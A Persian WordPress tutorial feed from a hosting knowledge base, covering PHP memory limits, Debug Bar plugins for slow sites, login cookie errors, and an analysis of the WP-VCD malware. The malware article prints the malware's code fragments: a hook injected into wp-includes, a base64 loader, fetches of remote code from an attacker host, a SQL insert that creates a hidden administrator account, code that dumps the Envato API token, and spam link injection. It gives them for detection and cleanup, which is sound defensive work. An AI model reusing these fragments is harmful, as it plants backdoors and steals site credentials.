بعد از اینکه صفحه ویرایش فایل براتون باز شد قطعه کد زیر را به فایل اضافه کرده و روی دکمه save کلیک کنید تا تغییرات در اون ذخیره بشه.

در صورتی که در هاست خودتون فایل htaccess. را پیدا نکردید و وجود نداشت کافیه با استفاده از برنامه‌های ویرایشگر متن مثل notepad یک فایل با نام htaccess. بسازید. یا اینکه در همین مسیر public_html روی گزینه New File کلیک کرده و یک فایل با همین نام ایجاد کنید.

php_value memory_limit 128M

بعد از این مرحله اگر محدودیتی از طرف میزبانی اعمال نشده باشه کد بالا براتون کار ساز بوده و به راحتی میتونید خطا را برطرف کنید. اما اگر به روش بالا باز نشد، در همون مسیر public_html هاست به دنبال فایل wp-config.php وردپرس بگردید و بعد از راست کلیک روی فایل و انتخاب گزینه Edit کدهای زیر را در فایل اضافه کنید.
define('wp_MEMORY_LIMIT','128M');

دقت کنید که کدهای فوق را در بخشی که کدهای define قرار داره، یعنی درست قبل از خط That’s all, stop editing! Happy blogging اضافه کنید. بعد از ذخیره فایل خواهید دید که مشکل محدودیت در حافظه پی‌اچ‌پی برطرف خواهد شد.
امیدوارم که این آموزش هم مورد توجه و پسند شما قرار گرفته باشه و با استفاده از اون تونسته باشید خطای محدودیت حافظه php را در وردپرس برطرف کنید. در صورتی که در رابطه با این آموزش و نحوه افزایش حافظه پی‌اچ‌پی سوال یا مشکلی داشتید در بخش دیدگاه‌ها اعلام کنید تا در کوتاه‌ترین زمان ممکن پاسخگوی شما باشم.

نوشته آموزش افزایش محدودیت حافظه php در وردپرس اولین بار در پدیدار شد.

آموزش رفع مشکل کندی لود در وردپرس با افزونه

$
0
0

کند بودن وردپرس یکی از مشکلاتی است که بیشتر کاربران تازه وارد وردپرس بعد از مدتی با آن مواجه می‌شوند که سرعت سایت به شدت افت می‌کند. کندی سرعت در وردپرس میتونه به دلایل گوناگونی رخ بده که از جمله این موارد میشه به موارد زیر اشاره کرد.

  1. استفاده از افزونه‌های زیاد
  2. مشکل در کدنویسی قالب
  3. استفاده از افزونه و قالب نال
  4. پایین بودن مشخصات هاست

بنابراین اولین کاری که باید برای افزایش سرعت وردپرس انجام دهید این است که اشکالات موجود در وردپرس را پیدا کنید. اما به نظر شما با چه روش‌هایی میتونیم بفهمیم که چرا سایت ما با کندی سرعت مواجه شده و به خوبی لود نمیشه؟ مثل همیشه حالت‌های اشکال زدایی بهترین گزینه برای دونستن این دلایل هستند. یکی از ویژگی‌های وردپرس که باعث شده به یک سیستم مدیریت محتوای محبوب تبدیل بشه داشتن حالت اشکال زدایی برای بخش‌های مختلف هست که اونو با عنوان Debug وردپرس میشناسیم. اما در این آموزش از پایگاه دانش میزبان‌فا قصد دارم به معرفی دو افزونه کاربردی بپردازم که کار اشکال زدایی در وردپرس را برای افزایش سرعت وردپرس براتون راحت‌تر خواهد کرد.

آموزش رفع مشکل کند بودن وردپرس با افزونه

اما برای اینکه بتونید از حالت‌های اشکال زدایی وردپرس استفاده کنید لازمه با استفاده از فایل wp-config.php وردپرس کدهای مربوط به حالت اشکال زدایی وردپرس را در این فایل قرار بدین و بسته به نوع مشکلی که دارید اونها را برطرف کنید. اما یک راه آسونتر که وجود داره اینه که میتونید با استفاده از افزونه اشکال یابی وردپرس بهتر سایتتون را بررسی کنید و ببینید که چه اشکالاتی در اون وجود خواهد داشت. افزونه‌هایی که در این آموزش قصد معرفیشون را دارم با نام‌های Debug Bar و Debug Bar Slow Actions در مخزن وردپرس رسیدند که با استفاده از دو افزونه میتونید اطلاعات بیشتری را برای اشکال زدایی وردپرس به دست بیارید.

برای شروع کار ابتدا روی دکمه زیر کلیک کنید تا به صفحه افزونه Debug Bar و Debug Bar Slow Actions هدایت شده و سپس با استفاده از آموزش نحوه نصب و کار کردن با افزونه ها در وردپرس اقدام به نصب و فعال سازی افزونه‌ها در سایت وردپرسی خودتون بکنید. افزونه Debug Bar توسط خود تیم وردپرس و چندین توسعه دهنده دیگه ساخته شده که تا به امروز تونسته بیش از 30.000 نصب فعال و کسب امتیاز 4.1 را ازآن خودش بکنه که میتونید از حالت اشکال زدایی برای وردپرس استفاده کنید و خطاهای سایتتون را ببینید. افزونه Debug Bar Slow Actions هم که وابسته به این افزونه هست و بدون اون کار نخواهد کرد برای این هست که بتونید بفهمید چه بخش‌هایی از سایت وردپرسی شما باعث کند شدن سایت شده، که این افزونه هم تا به امروز تونسته 800 نصب فعال و امتیاز 4.7 را ازآن خودش بکنه.

دانلود افزونه Debug Bar دانلود افزونه Debug Bar Slow Actions

افزونه‌های فوق امکان مشاهده اشکالات سایت را در موارد زیر به شما خواهد داد که عبارتند از:

  • مشاهده خطاهای PHP در وردپرس
  • نمایش کوئری‌های سایت موجود در پایگاه داده SQL
  • مشاهده wp Query های سایت
  • نمایش تعداد درخواست‌های HTTP در وردپرس و بازنویسی اطلاعات
  • مشاهده وضعیت کش در سایت
  • نمایش لیست توابعی که باعث کندی در سایت شده است
  • و…

حالا که افزونه‌ها را فعال کردید باید ابتدا کدهایی را در فایل wp-config.php قرار دهید تا علاوه بر فعال کردن حالت اشکال زدایی در وردپرس این امکان را داشته باشید که بتونید گزارشاتی که این افزونه‌ها در اختیارتون قرار میده را مشاهده کنید. بنابراین ابتدا وارد هاست خودتون شده و روی گزینه File Manager کلیک کنید.

کند بودن وردپرس و نحوه رفع مشکل کندی لود در وردپرس با Debug Bar

حالا وارد مسیر public_html شده و به مسیری که وردپرس را نصب کردید مراجعه کنید. فایلی با نام wp-config.php قرار داره که باید روی فایل راست کلیک کرده و گزینه Edit را انتخاب کنید تا به صفحه ویرایش فایل هدایت شده و کدهای زیر را به فایل کانفیگ وردپرس اضافه کنید.

define('WP_DEBUG', true);
define('WP_DEBUG_DISPLAY', false);
define('SCRIPT_DEBUG', true);
define('SAVEQUERIES', true);

کدهای فوق را باید در بخش define فایل یعنی درست قبل از خط /* That’s all, stop editing! Happy blogging. */ قرار داده و در نهایت فایل را ذخیره کنید تا دیباگ وردپرس و سایر حالت‌های اشکال زدایی در وردپرس فعال شود.

دقت کنید که قبل از هرگونه تغییر در فایل wp-config.php یک بار از محتویات فایل کپی بگیرید تا در صورت بروز مشکل یا خطایی بتونید سریعا مشکل را برطرف کنید. علاوه بر این دقت کنید که مقدار WP_DEBUG باید روی True قرار داشته باشه، اگر از قبل خط اول کد وجود داشت و روی حالت false بود اونو به true تغییر بدین.

WP_DEBUG: این گزینه حالت دیباگ وردپرس هست که برای بررسی و عیب یابی خطاهای PHP در وردپرس کاربرد داشته و هرجا خطایی وجود داشته باشه به صورت هشدار نمایش خواهد داد.

WP_DEBUG_DISPLAY: این گزینه هم برای نمایش خطاها در بالای صفحات هست. اما از اونجایی که با استفاده از افزونه میتونید خطاها را در صفحه افزونه ببینید بنابراین نیازی نیست که خطاها در سایت قابل مشاهده باشند.

SCRIPT_DEBUG: این گزینه هم خطاهای CSS و جاوا اسکریپت را به شما نمایش خواهد داد که به صورت اختیاری هست، یعنی میتونید در صورت نیاز با قرار دادن false به جای true این حالت را غیرفعال کنید.

SAVEQUERIES: این گزینه هم خطاهای موجود در هر صفحه از سایت را به شما نمایش خواهد داد که در منوی debug وردپرس قابل مشاهده است.

توجه کنید که نیازی به فعال کردن همه این گزینه‌ها نیست و صرفا کدهایی که در خط اول و چهارم قرار دارند کافیه، اما برای اینکه ما میخوایم به صورت کلی علت کند بودن وردپرس را بدونیم، بهتره از همه گزینه‌ها استفاده کنیم.  حالا که فایل wp-config.php ذخیره شده و هر دو افزونه نصب و فعال شدند خواهید دید که مشابه تصویر زیر منویی با نام Debug در نوار ابزار پیشخوان وردپرس اضافه شده که با کلیک روی این گزینه اطلاعات زیر به شما نمایش داده خواهند شد.

کند بودن وردپرس و نحوه رفع مشکل کندی لود در وردپرس با Debug Bar

همونطور که در تصویر میبینید به هر صفحه از سایت خودتون(پیشخوان وردپرس یا بخش کاربری سایت) مراجعه کنید در نوار ابزار وردپرس روی دکمه Debug که کلیک کنید باکسی مثل تصویر بالا نمایش داده شده و اطلاعات سایت به صورت دسته بندی شده بهتون نمایش داده خواهد شد. در منوی بالایی اطلاعات مربوط به هاست شما نمایش داده میشه که شامل موارد زیر است.

  1. آدرس سرور
  2. نسخه PHP مورد استفاده
  3. نسخه MySQL مورد استفاده برای دیتابیس وردپرس
  4. میزان مصرف حافظه وردپرس

در صورتی که هر گونه خطای PHP یا اعلان جدید برای شما وجود داشته باشه دکمه Debug به رنگ نارنجی نمایش داده میشه که میتونید روی ستون Notices / warnings کلیک کرده و خطاها را مشاهده کنید که در اینجا به دلیل عدم وجود خطا این ستون نمایش داده نمیشه.

Queries: این ستون لیستی از کلیه کوئری‌های پایگاه داده را به شما نشون میده که در هر صفحه از سایت از طریق SQL لود می‌شوند. علاوه بر این به شما نشون میده که هر بخش به کدوم یکی از جدول‌های دیتابیس وردپرس اشاره دارد.

کند بودن وردپرس و نحوه رفع مشکل کندی لود در وردپرس با Debug Bar

WP Query: این ستون درخواست‌هایی که برای اجرای کوئری وردپرس ارسال میشه را به شما نشون میده. همچنین اطلاعات در مورد پارامترهای حلقه، آی‌دی شیء و قالبی که از اون استفاده میکنید را هم نمایش خواهد داد. در صورتی هم که در هر یک از صفحات خطایی وجود داشته باشه از اینجا اشاره‌ای به اون خواهد شد.

کند بودن وردپرس و نحوه رفع مشکل کندی لود در وردپرس با Debug Bar

Object Cache: این ستون هم اطلاعات پایه‌ای از کش سایت را نمایش خواهد داد که به نوع مکانیزم ذخیره سازی و کش وردپرس بستگی خواهد داشت.

کند بودن وردپرس و نحوه رفع مشکل کندی لود در وردپرس با Debug Bar

Slow Actions: و در نهایت که مهم‌ترین بخش کار هست و برای بررسی علت کند بودن وردپرس از اون استفاده میکنیم، مربوط به افزونه دومی هست که 100 مورد از آخرین موارد درخواست‌های ارسالی و دریافتی در وردپرس را بررسی کرده و بر اساس کند بودن به صورت لیست شده به شما نشون میده که میتونید از همین طریق بفهمید چه بخش‌هایی از سایت وردپرسی شما کند عمل میکنه که باعث کند شدن وردپرس در ساختار کلی سایت شده است. این اطلاعات شامل موارد زیر خواهد بود.

  • اقدامات منحصر به فرد
  • اقدامات کلی
  • زمان اجرای هر یک از کارها
  • کندترین کارها

این زمان‌ها بر اساس میلی ثانیه نمایش داده خواهند شد که هر چه این مقدار بیشتر باشه به معنی کند بودن اون بخش هست که در این لیست 100 تایی در رده بالاتری قرار خواهد گرفت.

همونطور که در تصویر بالا میبینید در بخش Slow Actions کارهایی که در وردپرس صورت میگیره به ترتیب کندترین اونها لیست شده و نمایش داده خواهد شد که با کلیک روی هر کدوم از این گزینه‌ها میتونید تعداد کلی فراخوانی دستورات، تعداد فراخوانی هر کدوم از دستورات، زمان فراخوانی بر حسب میلی ثانیه و زمان کلی را مشاهده کنید که نمونه‌ای از اونو در تصویر زیر میبینید.

کند بودن وردپرس و نحوه رفع مشکل کندی لود در وردپرس با Debug Bar

برای بررسی کند بودن میزان سرعت وردپرس و افزایش سرعت وردپرس حالا باید کلیه این داده‌ها را به دقت بررسی کنید و بعد از عیب یابی هر یک از وظایف اقدام به رفع اونها بکنید تا در نهایت اجرای هر وظیفه را در وردپرس به کمترین مقدار خودش برسونید. با کمتر شدن مدت زمان اجرای هر وظیفه در نهایت تاثیر خوب اون روی اجرای کل وظایف اعمال شده و باعث میشه سایت شما در کوتاه‌ترین زمان ممکن لود و در دسترس قرار گیرد.

امیدوارم که این آموزش هم مورد توجه و پسند شما قرار گرفته باشه و با استفاده از اون تونسته باشید اقدام به رفع مشکل کند بودن وردپرس بکنید. در صورتی که هر گونه سوال یا مشکلی در رابطه با این آموزش و نحوه عیب یابی علت کاهش سرعت وردپرس داشتید در بخش دیدگاه‌ها اعلام کنید تا در کوتاه‌ترین زمان ممکن پاسخگوی شما باشم.

نوشته آموزش رفع مشکل کندی لود در وردپرس با افزونه اولین بار در پدیدار شد.

شیوع بدافزار WP-VCD در سایت‌های وردپرسی

$
0
0

از مشکلات عمده جامعه وردپرس فارسی اینه که محصولات افزونه و قالب وردپرس که به صورت نال شده و غیر اورجینال تهیه شده و در اختیار کسانی که به دنبال خرید قالب و افزونه هستند قرار گرفته است. اما مشکل بزرگتر درست وقتی رخ میده که از یک طرف به دلیل تحریم و از طرف دیگه به علت افزایش هزینه برای خرید این محصولات خیلی از افراد از خیر خرید مستقیم از سایت‌هایی مثل انوانتو گذشته و از مارکت‌ها و فروشگاه‌های ایرانی که هیچ تضمینی در اصالت محصولات وجود نداره خرید خود را انجام می‌دهند. ماجرا وقتی بدتر میشود که اکثر این محصولات حتی در مارکت‌هایی بزرگ و معتبر هم به صورت اصل تهیه نشدند و از طریق سایت‌هایی که این محصولات را منتشر می‌کنند دانلود شده و پس از راست چین کردن و فارسی سازی با قیمت بسیار کمتری از محصول در فروشگاه انوانتو در اختیار کاربران قرار می‌گیرند.

همین مسئله باعث به وجود اومدن بدافزارهای و شیوع اونها در سایت‌های وردپرسی میشه که همه ساله با گزارش‌های مختلفی از هک سایت‌های وردپرسی مواجه میشیم. اما به جای اینکه به خودمون رجوع کنیم و پی به علت ماجرا که استفاده از محصولات نال شده است ببریم، به دنبال مقصر گذشته و تقصیرات را به گردن فروشندگان و مارکت‌هایی که این محصولات را خریداری کردیم میندازیم. البته درسته که کاری که اونها انجام میدن هم به مراتب بدتر هم هست و بی تقصیر هم نیستند.

شیوع بدافزار WP-VCD در سایت‌های وردپرسی

در طی یک سال گذشته بدافزار WP-VCD از همین طریق باعث آلوده شدن بسیاری از سایت‌های وردپرسی شده است. این بدافزار که از طریق فایل‌های قالب و افزونه وردپرس به سایت تزریق میشه میتونه یک یوزر ادمین به صورت خودکار ایجاد کرده و کارهای خرابکارانه روی سایت شما اعمال بکنه. به محض شروع کار بدافزار WP-VCD کدهایی در هسته اصلی وردپرس، قالب وردپرس، افزونه وردپرس و در دایرکتوری‌های مختلف دیگه از هاست باعث آلوده شدن ساختار کلی سایت و به دست گرفتن کنترل سایت خواهند شد. که شامل موارد زیر است.

  1. ایجاد یک کاربر در وردپرس با نقش کاربری مدیرکل و با نام کاربری 100010010
  2. تزریق لینک‌های مخرب در فوتر وردپرس که با استفاده از این لینک‌ها معمولا کارهایی خرابکارانه مثل استفاده از روش‌های کلاه سیاه سئو برای ضربه زدن به سایت شده و از طرفی با نمایش تبلیغات اسپم در سایت قربانی باعث پنالتی شدن سایت در گوگل خواهد شد.
  3. تزریق کدها از طریق فایل functions.php قالب که جزو مهم‌ترین فایل در قالب وردپرس است و با استفاده از اون میشه هر کاری را در سایت انجام داد. کدی که در این فایل تزریق میشه حتی امکان تغییر در محتوای مطالب و به‌روزرسانی نوشته‌ها در وردپرس را هم دارد.
  4. این بدافزار صرفا به همینجا بسنده نکرده و با قرار دادن فایل‌های مخرب دیگه در پوشه wp-includes کارهای خرابکارانه بیشتری را هم روی سایت انجام خواهد داد که در ادامه به معرفی این فایل‌ها می‌پردازم.

نحوه شیوع بدافزار WP-VCD و کارکرد آن روی سایت

اولین کاری که توسط این بدافزار اعمال میشه با اضافه شدن قطعه کد زیر در فایل post.php که در داخل پوشه wp-includes قرار داره انجام خواهد گرفت.

<?php if (file_exists(dirname(__FILE__) . '/wp-vcd.php')) include_once(dirname(__FILE__) . '/wp-vcd.php'); ?><?php
/**  2 /**
* Core Post API

همونطور که میبینید در قدم بعدی با اضافه شدن این کد فایلی با نام wp-vcd.php به همین دایرکتوری اضافه میشه که به صورت base64 کدگذاری شده و با نام $install_code شروع به نصب برخی کد در فایل‌ها خواهد کرد.

$install_code = 'PD9waHANCg0KaWYgKGlzc2V0KCRfUkVRVUVTVFsnYWN0aW9uJ10pIC[...]
$install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);
   $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));

کاری که کد بالا انجام میده اینه که کدهای زیر را به فایل فانکشن قالب وردپرس اضافه خواهد کرد.

if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php')){
    if (strpos($content, 'WP_V_CD') === false){
        $content = $install_code . $content ;
        @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content);
        touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php' , $time );
    }
    else { $ping = false; }
}

سپس از راه دور فایلی با نام o.php را فراخوانی کرده و یک فایل متنی با نام class.wp.php را در پوشه wp-includes قالب قرار خواهد داد. که در کدهای زیر نمونه‌ای از آن را میبینید.

$content = @file_get_contents('http://www.aotson.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
                       @file_put_contents(ABSPATH . '/wp-includes/class.wp.php', file_get_contents('http://www.aotson.com/admin.txt'));

حالا که کدهای فایل class.wp.php اضافه شدند. شامل کدهای زیر هستند که با استفاده از زبان php و کنترل دیتابیس کاری که انجام میدن اینه که یک یوزر با نام کاربری 100010010 در وردپرس اضافه خواهند کرد و نقش کاربری مدیرکل را به آن خواهند داد.

$wpdb->query("INSERT INTO $wpdb->users (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES ('100010010', '100010010', '\$P\$BaRp7gFRTND5AwwJwpQY8EyN3otDiL.', '100010010', 'te@ea.st', '', '2011-06-07 00:00:00', '', '0', '100010010');");

سپس با استفاده از کلید واژه API Toolkit Envato Market احتمالا درخواست یک به‌روزرسانی برای قالب یا افزونه نمایش داده خواهد شد.

if( isset($_GET['key']) ) { $options = get_option( EWPT_PLUGIN_SLUG ); echo '<center><h2>' . esc_attr( $options['user_name'] . ':' .  esc_attr( $options['api_key'])) . '<br>';
 echo esc_html( envato_market()->get_option( 'token' ) ); echo '</center></h2>'; }}

بعد از این مرحله مجددا از راه دور محتویات فایل codecxc.txt به صورت موقت داخل دایرکتوری php تزریق خواهند شد که کدهای زیر در آن قرار دارند.

$tmpfname = tempnam(sys_get_temp_dir(), "wp_temp_setupx");
   $handle = fopen($tmpfname, "w+");
   fwrite($handle, "<?php\n" . $phpCode);

از آنجایی که کدهای مخرب معمولا در قالب‌های پرطرفدار تزریق شده است در برخی قالب‌ها که سایت‌های افراد قربانی از این طریق به بدافزار wp-vcd آلوده شدند کدهای زیر قرار داشتند.

//$exec=exec('mv /var/sites/e/exchange.stirlingworx.tech/public_html/wp-content/themes/Gridlove/gridlove/functions.php');
//file_put_contents('/home/hoefsmederijvanr/public_html/wp-content/themes/betheme/functions.php', $file);

حالا از همین طریق مجددا با استفاده از تزریق کدهایی در فانکشن قالب این بار سعی میشه تا در دیتابیس دست برده بشه و ساختار کلی دیتابیس برای جایگزینی لینک‌ها و هر نوع محتوایی تغییر خواهند یافت که در زیر نمونه‌ای از اونو میبینید که ازش برای تغییر جدول post که مربوط به نوشته‌ها هست استفاده شده است.

foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data)
[...]
$post_content = preg_replace('!<div id="'.$div_code_name.'">(.*?)</div>!s', '', $data -> post_content);
[...]
$file = preg_replace('/'.$matcholddiv[1][0].'/i',$_REQUEST['newdiv'], $file);
[...]
$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
if ($wpdb -> query('INSERT INTO `' . $wpdb->prefix . 'datalist` SET `url` = "/'.mysql_escape_string($_REQUEST['url']).'", `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string($_REQUEST['content']).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'"'))

با استفاده از محتوای html که در کدهای بالا قرار داره فایلی با نام code1.php از راه دور کدهایی مجددا به فایل فانکشن قالب اضافه شده و شروع به اضافه کردن فایل دیگری با نام wp-tmp.php در پوشه wp-includes خواهد کرد که محتویات زیر در این فایل قرار دارند.

if ( ! function_exists( 'wp_temp_setup' ) ) {
$path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];
if($tmpcontent = @file_get_contents("http://www.aotson.com/code1.php?i=".$path))

که در نهایت بعد از اجرای این کدها هم کدهای html زیر به سایت اضافه خواهند شد.

<style>.crdtsp{position:absolute;left:-1000px;}</style>
<div class="crdtsp"> 
<a href="https://www.downloadfreethemes.download/">downloadfreethemes</a></div>

اگر بخشی از کدهای فوق را در گوگل جستجو کنید با نتایج زیر برخورد خواهید کرد که نشان از شیوع گسترده این بدافزار در بسیاری از سایت‌ها وردپرسی دارد.

شیوع بدافزار WP-VCD در سایت‌های وردپرسی و نفوذ در وردپرس

اما مسئله به قدری بزرگ و فراگیر هست که کار به همینجا ختم نشده و با تزریق کدهای دیگه در بخش‌های مختلف سایت انواع فایل و کارهای خرابکارانه دیگه روی سایت صورت میگیره که تا به امروز این موارد بررسی شدند. که باید برای اطمینان خاطر از شیوع این بدافزار ابتدا پوشه wp-includes وردپرس خودتون را بررسی کرده و ببینید که کدوم یکی از فایل‌های زیر در اون قرار دارند.

class.wp.php
wp-cd.php
wp-vcd.php
wp-tmp.php
wp-feed.php

اگر هر یک از فایل‌های بالا در پوشه قرار داشتند باید از شیوع بدافزار wp-vcd در سایت خودتون مطمئن بشید و سریعا در اولین اقدام شروع به رفع مشکلات بکنید تا قبل از اینکه تاثیرات بیشتری از اون را در سایت ببینید.

توضیحاتی که تا به اینجا از این بدافزار دادم شاید در زمانی که در حال خواندن این مقاله هستید نهایتا 5 دقیقه به طول بینجامد. اما باید بدونید که اجرای بدافزار به این کندی پیش نخواهد رفت و در کسری از ثانیه کلیه کارهای بالا انجام گرفته و سایت شما را آلوده خواهد کرد.

چطور از شیوع این بدافزار در سایت خود جلوگیری کنیم؟

اگرچه این بدافزار شیوع پیدا کرده زیاد خطرناک نیست و میتوان به راحتی آن را برطرف کنید، اما برای جلوگیری کردن از وقوع آن در سایت خود و قرار نگرفتن در لیست قربانیان بهتر است تا پیش از وقوع حادثه چاره ای بیندیشید. بهترین راهکار این است که اگر همچنان از قالب و افزونه‌ای استفاده می‌کنید که مطمئن نیستید به صورت اورجینال تهیه شده، آن را از فروشنده اصلی دریافت کرده و با نسخه فعلی جایگزین کنید. در بیشتر موارد حتی قالب‌ها و افزونه‌هایی که خریداری می‌کنید از سایت‌ها نال شده به صورت رایگان دانلود شده و پس از فارسی سازی برای فروش با عنوان نسخه اورجینال عرضه می‌شوند که هیچ گاه نباید از چنین سایت‌هایی خریدی انجام دهید. با این کار در حفظ کپی رایت نیز گام بلندی برداشته‌اید و امنیت وردپرس سایت شما نیز بیشتر تامین خواهد شد.

در قدم بعدی باید از فایروال هاست خود برای نطارت در روی سایت استفاده بیشتری بکنید. هر چه زودتر بتوانید از اینکه آیا بدافزار در سایتتون نفوذ کرده یا نه جلوگیری کنید، راحت‌تر و سریع‌تر هم میتونید از شیوع بیشتر اون و انجام کارهای خرابکارانه بیشتر جلوگیری کنید. همچنین استفاده از افزونه WordFence Security هم یکی از بهترین راه‌ها برای دانستن زودتر این موضوع است که در صورت اضافه شدن فایلی غیرعادی و جدا از هسته وردپرس در هاست سریعا شما را مطلع خواهد کرد.

سایت من به بدافزار wp-vcd آلوده شده، چیکار کنم؟

بعد از اطمینان از این موضوع در اولین اقدام باید به مسیر افزونه‌ها در پیشخوان وردپرس رفته و کلیه افزونه‌های سایت خودتون را که غیر از مخزن وردپرس دانلود و نصب کردید غیرفعال کنید. سپس به مسیر نمایش در پیشخوان وردپرس رفته و یکی از قالب‌های پیشفرض وردپرس را به عنوان پوسته قالب خودتون انتخاب کنید. سپس از بخش کاربران در وردپرس کلیه اعضایی که نقش کاربری مدیر کل دارند را بررسی کنید و اطلاعات هر کاربر را هم چک کنید. اگر کاربری با نام 100010010 یا هر کاربری که مشکوک به نظر میاد مشاهده کردید نقش کاربری وی را از مدیر کل به مشترک تغییر داده و یا اینکه حذف کنید.

سپس با استفاده از ابزار اسکن امنیتی موجود در هاست خودتون کل سایت را از نظر امنیتی اسکن و بررسی کنید تا موارد مشکوک را برطرف کنید. در صورتی که با نحوه کارکرد این ابزار آشنایی ندارید میتونید با ارسال تیکت برای میزبانی هاست خودتون مشکل را مطرح کنید تا به کمک هاستینگ بررسی دقیق و کامل‌تری روی سایت شما از نظر امنیتی و رفع مشکل بدافزار صورت بگیرد.

پیش از انجام هر گونه تغییراتی در فایل‌های هاست مربوط به وردپرس یا دیتابیس وردپرس یک فو بک آپ از هاست خودتون تهیه کنید تا در صورتی که کاری به اشتباه انجام دادین مشکل را بیش از این بزرگتر نکنید و با جایگزین کردن نسخه فعلی مشکلات را کمتر کرده و به ادامه رفع ایرادات بپردازید.

در مرحله بعدی به آدرس fa.wordpress.org مراجعه کرده و آخرین نسخه وردپرس را از این آدرس دانلود کنید. سپس از داخل فایل zip دانلود شده پوشه wp-content و فایل wp-config.php را حذف کنید. حالا فایل زیپ را در مسیری که وردپرس را نصب کردید آپلود کرده و کلیه محتویات را به غیر از دو مورد ذکر شده جایگزین کنید تا فایل‌های مخرب از پوشه wp-includes حذف شوند.

در مرحله بعدی به مسیر تنظیمات> پیوندهای یکتا در پیشخوان وردپرس مراجعه کرده و یک بار روی دکمه ذخیره تغییرات کلیک کنید تا فایل htaccess. وردپرس هم آپدیت بشه تا اگر احیانا از طریق این فایل هم کاری صورت گرفته اصلاح شود. علاوه بر این کلیه پوشه‌های موجود در پوشه wp-contnet را هم بررسی کنید و هر فایل مشکوکی را که بررسی کرده و با نسخه اصلی جایگزین کنید.

حالا به phpmyadmin مراجعه کرده و با بررسی کل دیتابیس باید به دنبال این باشید که آیا تغییراتی در دیتابیس ایجاد شده است یا خیر. برای این موضوع باید از یک فرد متخصص کمک بگیرید تا دیتابیس را به درستی بررسی کنه. بیشترین سهم تغییرات در دیتابیس وردپرس توسط این بدافزار مربوط به جدول wp_posts است که نوشته‌ها در آن قرار دارند و با هدف تغییر در نوشته و وارد کردن لینک و محتوای اسپم مورد استفاده قرار می‌گیرد.

امیدوارم که این مقاله هم مورد توجه و پسند شما قرار گرفته باشه و با استفاده از اون با بدافزار wp-vcd آشنا شده باشید و امنیت سایت وردپرسی خودتون را با نصب افزونه و قالبی که مشخص نیست به صورت اورجینال هستند یا نه، به خطر نیندازید. علاوه بر این اگر این بدافزار در سایت شما ایجاد مشکل کرده در بخش دیدگاه‌ها کارهایی که برای رفع مشکل انجام دادید را هم ذکر کنید تا دوستانی که دچار این مشکل شدند هم بتونند با کمک‌های بیشتر شما مشکلاتشون را برطرف کنند.

نوشته شیوع بدافزار WP-VCD در سایت‌های وردپرسی اولین بار در پدیدار شد.

آموزش رفع مشکل مسدود شدن کوکی در وردپرس

$
0
0

مسدود شدن کوکی وردپرس یکی از مشکلاتی هست که به خاطر مشکلات کوکل مرورگر به وجود میاد. کوکی وردپرس وابسته به مرورگر هست که ممکنه به هر دلیلی دسترسی به کوکی در وردپرس وجود نداشته باشه و هنگامی که در صفحه ورود به پیشخوان وردپرس قرار داشته باشید با خطای کوکی ها به خاطر خروجی غیرمنتظره مسدود هستند مواجه شوید. معمولا این مشکل زمانی که حالت‌های کلی افزونه‌های امنیتی و ذخیره سازی را فعال کرده باشید رخ میده که به دلیل عدم دسترسی وردپرس به کوکی مرورگر قادر به ورود در وردپرس نخواهید بود.

در این آموزش از پایگاه دانش میزبان‌فا قصد دارم به نحوه رفع مشکل کوکی مرورگر در وردپرس بپردازم که با استفاده از راهکارهای معرفی شده در این مقاله میتونید مشکل مسدود بودن کوکی در وردپرس را هنگام ورود به پیشخوان وردپرس برطرف کنید.

آموزش حل مشکل مسدود شدن کوکی وردپرس

همونطور که در بالا اشاره شد وردپرس و هر سایت دیگری برای اینکه بتونه داده‌هایی که به صورت ثابت هستند و تغییری در اونها ایجاد نمیشه را در هر بار لود سایت براتون بارگذاری نکنه و از طرف دیگه هاست و سرور هم با مصرف بی رویه پهنای باند مواجه نشده با استفاده کردن از کوکی میاد و یک سری داده‌ها را در اولین ورود کاربر به سایت تا زمانی که تغییری در اونها ایجاد نشده باشه ذخیره میکنه. سپس در هر بار باز کردن سایت این داده‌ها را به جای لود کردن از هاست، از نسخه ذخیره شده روی مرورگر کامپیوتر کاربر لود میکنه که برخی از این داده‌ها در کوکل مرورگر ذخیره می‌شوند.

حالا گاهی مشکلی پیش میاد که یا به دلیل خطای برنامه نویسی یا اینکه مسدود شدن کوکی مرورگر کاربران این داده‌ها قابل لود نیستند و از طرفی هم از هاست لود نمیشن، بنابراین وقتی در وردپرس وارد میشید در این حالت خطای کوکی ها به خاطر خروجی غیرمنتظره مسدود هستند نمایش داده میشه که قادر به ورود در وردپرس نیستید. این مشکلات ممکنه به دلایل زیر به وجود بیاد.

  • استفاده ار پروکسی هنگام ورود به مدیریت وردپرس
  • مشکل در افزونه‌های وردپرس
  • مشکل در قالب وردپرس
  • مشکل در تنظیمات مرورگر

هنگامی که این مشکل به وجود میاد با صفحه‌ای مشابه تصویر زیر مواجه میشید که پیغام خطا کوکی‌ها مسدود شده‌اند یا توسط مرورگر شما پشتیبانی نمی‌شوند. شما باید آن‌ها را فعال کنید تا وردپرس بتواند از آن استفاده نماید. مواجه خواهید شد.

